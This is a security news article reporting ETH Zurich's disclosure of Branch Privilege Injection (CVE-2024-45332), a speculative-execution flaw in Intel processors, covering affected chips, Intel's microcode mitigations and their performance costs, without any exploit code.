Do Son 
A research team from ETH Zurich has uncovered a new architectural-level vulnerability affecting all modern Intel processors from the ninth generation onward. The flaw, named Branch Privilege Injection and tracked as CVE-2024-45332, allows attackers to extract sensitive information from privileged memory regions, including operating system kernel data, passwords, cryptographic keys, and the contents of other processes.
The issue arises from branch prediction mechanisms—specifically the Branch Target Buffer (BTB) and Indirect Branch Predictor (IBP)—which are designed to accelerate instruction execution by speculatively forecasting control flow. These predictions, though later discarded if incorrect, are executed speculatively. ETH Zurich demonstrated that under certain conditions, updates to the predictor can occur asynchronously with instruction execution, thereby violating privilege boundaries.
When a switch occurs between user and privileged modes—such as during a system call—there exists a brief window wherein a predictor update may be linked to the incorrect privilege level. This grants attackers the ability to induce a mispredicted branch within the kernel, triggering the speculative execution of protected instructions and enabling data leakage through a side-channel.
The researchers developed an exploit capable of training the processor to speculatively jump to a preselected piece of code—known as a “gadget”—during a system call. This results in speculative execution within the kernel space, where secret data loaded into the cache can be subsequently inferred by the attacker via cache-based side effects.
An experimental proof-of-concept demonstrated the ability to read the “/etc/shadow” file on Ubuntu 24.04, even with security mitigations enabled. The leak rate reached 5.6 KB/s with an accuracy of 99.8%.
The vulnerability impacts all Intel CPUs from the ninth generation onward, including Coffee Lake, Comet Lake, Rocket Lake, Alder Lake, and Raptor Lake. Researchers also observed circumvention of the Indirect Branch Prediction Barrier (IBPB) on seventh-generation Kaby Lake processors. While older architectures were not tested, the researchers speculate they are likely vulnerable to Spectre v2-like attacks due to a lack of Enhanced IBRS (eIBRS) support.
Additional analysis was conducted on Arm Cortex-X1, Cortex-A76, and AMD Zen 4 and Zen 5 processors. None of these architectures exhibited the same asynchronous predictor behavior, rendering them immune to CVE-2024-45332.
Although the proof-of-concept attack was performed on Linux, the issue stems from hardware-level behavior, meaning it could also be exploited on Windows systems. Intel was notified of the vulnerability in September 2024 and has since released microcode updates to address the flaw on affected models.
According to Intel, firmware-level mitigations introduce a performance overhead of approximately 2.7%, while software-based defenses may impact performance by 1.6% to 8.3%, depending on the processor. The actual risk to most users remains low, as successful exploitation requires a specific set of conditions. Nonetheless, users are strongly advised to install the latest BIOS/UEFI and operating system updates.
Full details of the attack are scheduled to be presented at USENIX Security 2025. In an official statement, Intel expressed its gratitude to the ETH Zurich team for the coordinated disclosure and emphasized that no real-world exploitation of CVE-2024-45332 has been observed to date.
Donate